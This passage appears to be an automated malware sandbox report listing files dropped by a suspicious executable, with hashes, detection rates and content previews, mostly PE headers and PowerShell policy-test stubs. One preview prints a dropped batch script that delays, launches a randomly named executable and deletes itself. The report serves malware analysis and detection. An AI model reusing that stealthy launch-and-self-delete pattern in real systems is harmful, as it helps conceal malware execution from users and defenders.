Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8...........8.. ....9...@.. .......................@9...........@...................................8.K.....9.p.................... 9...................................................... ............... ..H............text...4.8.. ....8................. ..`.rsrc...p.....9.......8.............@....reloc....... 9.......8.............@..B..................8.....H.......D...8.......s...\|.......W.8......................................0..........(.... ........8........E....M.......)...N...8H...(.... ....~....{....:....& ....8....(.... ....~....{m...:....& ....8....(.... ....8........0.......... ........8........E............\|.......F.......8........~....(X...~....(\... ....?`... ....~....{....9....& ....8....~....(P... .... .... ....s....~....(T....... ....8g...r...ps....z8.... ....~....{....:B...& ....87...~....9.... ....~....{j...

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\cef_process.exe.log

Download File

Process:	C:\RuntimeDll\cef_process.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1698
Entropy (8bit):	5.367720686892084
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4x:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4x
MD5:	2C0A3C5388C3FAAFA50C8FB701A28891
SHA1:	D75655E5C231DE60C96FD196658C429E155BEB0F
SHA-256:	A44CB861DDF882F48202B95D3A8A535419C1AE0386666C84B803F9810473EDD7
SHA-512:	0343301C34ED4FEB7EFF30186862EBC7446E6044955B3088B0BE0D86A3DACAE1BFC407A59D385E9CBB7A0DEF210DC3405FD442A598FD28431371E249F748258A
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	1.1510207563435464
Encrypted:	false
SSDEEP:	3:Nlllullkv/tz:NllU+v/
MD5:	6442F277E58B3984BA5EEE0C15C0C6AD
SHA1:	5343ADC2E7F102EC8FB6A101508730898CB14F57
SHA-256:	36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
SHA-512:	F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\0MaLlOrxiN.bat

Download File

Process:	C:\RuntimeDll\cef_process.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	202
Entropy (8bit):	5.284006814519397
Encrypted:	false
SSDEEP:	6:hCRLuVFOOr+DEimKQkSlmMKKOZG1cNwi23fboh:CuVEOCDEi9KmMjZDG
MD5:	CE998E9E0FAE4CC8F0B467A0296379AA
SHA1:	C79EB103EEACB84BF8A6430B26BC579A101F25F1
SHA-256:	6FCD34A78EA621FFF4852066216C9F1091C70C5A01A40863CDA6F680F8B11A9C
SHA-512:	A0DD7843058F5A3F811109274C9587B9A4459589F313568A316B21783AAF9CBCE1E16F2093F938F3B8D29FB41D60199DC09EA4DD85536DBB9B4A4814CFBE569C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\0MaLlOrxiN.bat"

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0jicts5u.2ua.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0l0tkgwa.oz2.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0yjhscru.aym.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4of5xyid.r2w.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4slo1ov4.qpv.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_52vjzlx5.ba3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c2h10ylj.l3k.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_canc0hgc.blq.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d0djxqrm.i5l.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ejnryuvo.ux0.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fvkccjkd.dyv.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g35gsewh.h35.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ghu0wjrk.bza.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kq0332s1.c2h.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lmlu1ctz.3b5.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m30f3fgk.pxf.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mmsjatds.yl3.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ubuae1sx.5u3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ya3jxzld.g0d.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z04i3w4y.fez.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\npEqFN9XfG

Download File

Process:	C:\RuntimeDll\cef_process.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.403856189774723
Encrypted:	false
SSDEEP:	3:Mnsgwn9In:Msl9I
MD5:	E5ECE1039D3A31C4F5EFB0F760129D32
SHA1:	44E42141C2A9A42E0999603AC4724F5DA5B038E6
SHA-256:	24E50C8CC1407282EC86FA58173CDD53F9F0BA689E4D397C2C39CC23DDF6F23A
SHA-512:	1FBDD4699D518A0AC40CDAAB055F5E50827410319D0D1B30C684C6FEAFF113EE95A6C54D3D197E8CB912F2448F48F59D07B4A7FBD5EF08B4BBC7895309B4EB07
Malicious:	false
Preview:	zb7rDsgI5nZ5LFSpxOByg4rAT

C:\Users\user\Desktop\CNRzgtSC.log

Download File

Process:	C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	5.41854385721431
Encrypted:	false
SSDEEP:	384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
MD5:	BBDE7073BAAC996447F749992D65FFBA
SHA1:	2DA17B715689186ABEE25419A59C280800F7EDDE
SHA-256:	1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
SHA-512:	0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 4%
Joe Sandbox View:	Filename: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, Detection: malicious, Browse Filename: FMd6ntIhQY.exe, Detection: malicious, Browse Filename: jD1RqkyUNm.exe, Detection: malicious, Browse Filename: ggJWCFp2S3.exe, Detection: malicious, Browse Filename: qM9xet97tX.exe, Detection: malicious, Browse Filename: NHd2wtJdTH.exe, Detection: malicious, Browse Filename: Z7q8C34yfN.exe, Detection: malicious, Browse Filename: VrKU8bWf4W.exe, Detection: malicious, Browse Filename: 4NE6yDivAo.exe, Detection: malicious, Browse Filename: tSht4UNfrv.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\CfUiBMYm.log

Download File

Process:	C:\RuntimeDll\cef_process.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\CtGsekUC.log

Download File

Process:	C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\DJEawqoG.log

Download File

Process:	C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\DhKAQyQA.log

Download File

Process:	C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
